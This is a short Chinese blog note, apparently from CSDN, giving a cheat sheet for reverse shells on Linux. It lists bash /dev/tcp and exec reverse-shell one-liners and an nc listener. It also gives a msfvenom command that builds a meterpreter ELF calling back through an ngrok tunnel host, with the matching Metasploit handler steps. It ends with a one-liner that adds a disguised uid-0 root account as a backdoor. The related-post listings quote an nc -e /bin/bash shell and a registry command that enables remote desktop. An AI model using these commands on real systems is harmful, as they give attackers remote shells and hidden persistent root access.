反弹shell

最新推荐文章于 2022-04-21 17:42:29 发布
最新推荐文章于 2022-04-21 17:42:29 发布
阅读量83 收藏
点赞数
分类专栏: 笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45566117/article/details/119648936
版权

linux本地配合ngrok内网穿透生成,liunx上线

反弹shell

本地监听
nc -lvvp 4444
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
exec 8<>/dev/tcp/127.0.0.19/4444;bash<&8 >&8 2>&8

生成liunx马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=隧道端口 -f elf >f.elf

配置监听

1.use exploit/multi/handler
2.set payload linux/x86/meterpreter/reverse_tcp
3.set lhost (和ngrok上面配置一样)
4.set lport(和ngrok上面配置一样)
5.run -j

ngrok命令

./sunny clientid 隧道id
运行木马即可上线

后渗透代补充

useradd -p openssl passwd -1 -salt &apos;lsof&apos; admin123 -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/iptabies iptables 非交互式一句话添加root用户

mss的teacher
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell初识
无痕的博客
11-01 3998
反弹shell的指令与演示
Linux反弹shell
good good study
04-21 4189
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
详解NC反弹shell的几种方法
01-08
正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1...
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
雷电模拟器装Xposed
qq_45566117的博客
08-20 4165
自己在装Xposed的时候遇到不能自动下载,显示一段could not字样。 装了tz发现不是fq的问题 自己装了豌豆荚然后下载亲测有效 安装过程: 1.下载一个豌豆荚(别的应用市场也可以) 2.搜索xposed框架 3.安装 ...
linux安装配置tinyproxy
qq_45566117的博客
04-21 2347
1、使用yum或者apt-get安装tinyproxy yum install tinyproxy -y 或者 apt-get install tinyproxy 2、安装后更改配置文件 : vim /etc/tinyproxy/tinyproxy.conf 修改配置文件中的 allow 127.0.0.1 注释掉则允许所有ip访问 #allow 127.0.0.1 加入多个ip或者IP段则允许多个ip或IP段访问 allow 192.168.0.1 allow 10.12.13.1 allow 188.1
显卡驱动无法更新代码19注册列表位置
qq_45566117的博客
09-03 2267
运行Regedit然后在注册表中把HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class{4D36E968-E325-11CE-BFC1-08002BE10318}中大括号所对应的项删掉(显示卡部分的注册项),重启机器会重新安装显卡相应驱动即可
服务器搭建代理ip
qq_45566117的博客
02-10 1378
openssl 判断 openssl version -a 安装 yum install openssl squid yum install -y squid* net-tools yum install net-tools squid.conf 修改端口 开发防火墙 firewall-cmd –zone=public –add-port=1234/tcp –permanent firewall-
linux开启history日志审计,位置在var/message
qq_45566117的博客
03-12 508
1.配置 /etc/profile 配置文件 2.export PROMPT_COMMAND=’{ msg=$(history 1 | { read x y; echo KaTeX parse error: Expected 'EOF', got '}' at position 4: y; }̲);logger "[euid…(whoami)]":(whoami)[pwd]"(who am i) [pwd] "(whoami)[pwd]"msg";}’ 添加在export下面。 ...
电脑修改用户名
qq_45566117的博客
08-21 424
我用#CSDN#这个app发现了有技术含量的博客,小伙伴们求同去《更改电脑用户名(可更改C:\Users\用户名)》, 一起来围观吧 https://blog.csdn.net/zhang_jinhe/article/details/40624847?utm_source=app
cmd打开3389
qq_45566117的博客
04-06 375
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f加粗样式
2021sudo升级1.9.2
qq_45566117的博客
02-04 215
下载升级包 参考链接: https://www.sudo.ws/alerts/unescape_overflow.html https://access.redhat.com/security/vulnerabilities/RHSB-2021-002 1.tar zxf sudo-1.9.5p2.tar.gz && cd sudo-1.9.5p2 (解压) 2…/configure --prefix=/usr --libexecdir=/usr/lib --w
一步开启Python simplehttpserver
qq_45566117的博客
08-12 194
python -m SimpleHTTPServer 8888 需要Python环境,目前2.7
反弹shell无法反弹
最新发布
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值